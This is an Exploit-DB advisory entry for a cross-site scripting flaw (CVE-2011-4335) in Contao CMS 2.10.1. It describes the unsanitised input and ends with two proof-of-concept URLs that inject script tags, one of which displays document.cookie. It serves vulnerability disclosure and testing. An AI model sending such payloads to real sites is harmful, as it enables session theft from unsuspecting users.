Contao CMS 2.10.1 Cross-Site Scripting Vulnerability

2011-10-02T00:00:00
ID EDB-ID:36225
Type exploitdb
Reporter Stefan Schurtz
Modified 2011-10-02T00:00:00

Description

Contao CMS 2.10.1 Cross-Site Scripting Vulnerability. CVE-2011-4335 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/50061/info

Contao is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Contao 2.10.1 is vulnerable; other versions may also be affected. 

http://www.example.com/contao-2.10.1/index.php/teachers.html?"/><script>alert('xss')</script>
http://www.example.com/contao-2.10.1/index.php/teachers/'"</style></script><script>alert(document.cookie)</script>